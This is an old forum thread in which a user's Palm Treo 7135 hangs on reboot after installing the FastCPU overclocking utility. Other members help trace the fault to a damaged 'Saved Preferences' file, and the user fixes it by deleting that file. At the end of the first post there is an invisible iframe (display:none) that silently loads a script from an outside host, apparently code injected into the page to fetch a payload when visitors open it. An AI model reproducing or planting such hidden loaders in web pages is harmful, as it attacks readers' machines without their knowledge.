+ Reply to Thread
Results 1 to 8 of 8
  1. #1
    Registered User
    Join Date
    01-27-2003
    Posts
    252

    PLEASE HELP!! FastCPU Hosed my 7135!

    I need some help please!!!


    I decided to stupidly install FastCPU on the 7135.

    Well I am dead in the water!!!

    Here is my situation:

    7135 with BackupBuddy VFS on a Sandisk 256mb SD card. I just Hot Synced the 7135 to my desktop and installed the FastCPU in the process.

    I had a backup of my 7135 through BackupBuddy VFS about 1 hour ago. Once I installed FastCPU and activated it. It revered screen me on reboot and never allowed me to even access the Prefs. like the manual says to bypass the program in case of a problem on boot.

    So after a few attempts I decided to do my very first Hard reset.

    No problem and everything went back to factory. I then tried to recover from BackupBuddy VFS which had NO copy of FastCPU or for that matter no new backup from the last 1 hour and the recovery went through just fine. Once I was told to reset (which I did) The palm revered screen on me again. THERE is NO FastCPU on the backup recovery!!!

    So then I hard reset it again and this time I did a recovery from the HotSync from the desktop. I made sure I removed the FastCPU from my backup folder of the User folder of my palm software on the desktop so it does not RECOVER it back onto the Palm.

    Recovery went through with no problems from the desktop to the 7135. Again I was told to reset the palm by tapping on the button on the screen and once it reset the palm went reverse screen again!! I am really pissed off and I can't believe there is something on this thing that is causing the 7135 to hang once I do a recovery even though none of my backups every had a hint of FastCPU on them!!!

    PLEASE HELP !!!!!!!!!!!!
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

  2. #2
    Registered User
    Join Date
    01-27-2003
    Posts
    252
    Also, does anyone famalier enough with FastCPU know what settings or files it creates that could be lingering in my backup (How I don't know) Or memory changes that it may make that once I install those apps that I told it to speed up could be giving me the problems. Even though the apps were never backed up AFTER FastCPU was installed.

    I told FastCPU to speed up the mail programs and browsing apps to speed up to th 44mhz. Like Blazer, snappermail, EIS and I think that was it.

  3. #3
    Registered User
    Join Date
    01-24-2003
    Location
    Torrance, CA - USA
    Posts
    420
    I hear it wasn't a good idea to speed up programs that use a phone connection, and all those you mentioned do.

    I'm also not a fan of accelerator programs in general. If the manufacturer could make their phones faster through software, I'm sure they would. I don't have any information to help you, but good luck!

  4. #4
    Registered User
    Join Date
    07-31-2002
    Posts
    228
    Try doing the restore with the saved prefs file removed as well. If it works, you will need to re-enter registration for your apps. That said, as long as you did the backup before FastCPU was installed, there is truly *nothing* that would still be in there after a hard reset. FWIW, I used FastCPU for awhile and did not get this problem. However, as noted, there are other issues, and I've removed it. I think that asking this relatively slow processor, already integrating palm and phone functions, to work faster is just asking for problems.... Good luck!

  5. #5
    Registered User
    Join Date
    01-27-2003
    Posts
    252
    Ok, after about 1.5 hrs of testing. I have found out that my "Saved Preferences" file is is culprit. I have three questions:

    1- I have a good idea of what kind of info is on that file but what other programs usually uses that file ?

    2- is there ANY way I can edit the file to see if there is some FastCPU settings hiding in there?

    3- How the heck can this file get damaged from a backup that was not modified by FastCPU ??

    Any help would be greatly appreciated!!!

    Aside from that I guess it is time to reset all my prefs. Now if I only remember all those settings!

  6. #6
    poked back in
    Join Date
    11-19-2002
    Location
    Redmond, WA
    Posts
    358
    Everything uses that file. Delete it and reput in all your data you lose.

  7. #7
    Registered User kniteman's Avatar
    Join Date
    03-12-2003
    Location
    Willis, TX
    Posts
    437
    Originally posted by babacksh
    Ok, after about 1.5 hrs of testing. I have found out that my "Saved Preferences" file is is culprit. I have three questions:

    1- I have a good idea of what kind of info is on that file but what other programs usually uses that file ?

    2- is there ANY way I can edit the file to see if there is some FastCPU settings hiding in there?

    3- How the heck can this file get damaged from a backup that was not modified by FastCPU ??

    Any help would be greatly appreciated!!!

    Aside from that I guess it is time to reset all my prefs. Now if I only remember all those settings!
    If you look on PalmGear or FreePalmsoftware for preference file editors like LeftOvers or PrefEd or the new version of Filez 5.04 it has a pref editor built in it.

    The only problem is that a lot of the programs do not identify or tag the extra files that they generate so sometimes when your trying to edit or delete them out you sometimes delete something good.

    So deleting the Saved prefs file is the easiest, you might also need to delete the psyslaunch file also to cure all the problems.
    Remember, When the long night comes return to the end of the beginning.

  8. #8
    Registered User
    Join Date
    01-27-2003
    Posts
    252
    well thanks everyone. I ended up just throwing away the Saved Prefs and reset my settings which was not that bad, but went through ALL programs and functions of the phone to verify all settings. My DateBook and Supernames was probably my biggest pain in the !@#!@# to fis in terms of settings since there is so many of them!!!

    One thing I was wondering about is that I never did throw away the psyslaunch file and everything seems to be working fine. What does this file do and if I got rid of it, what will that reset ??

    thanks.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts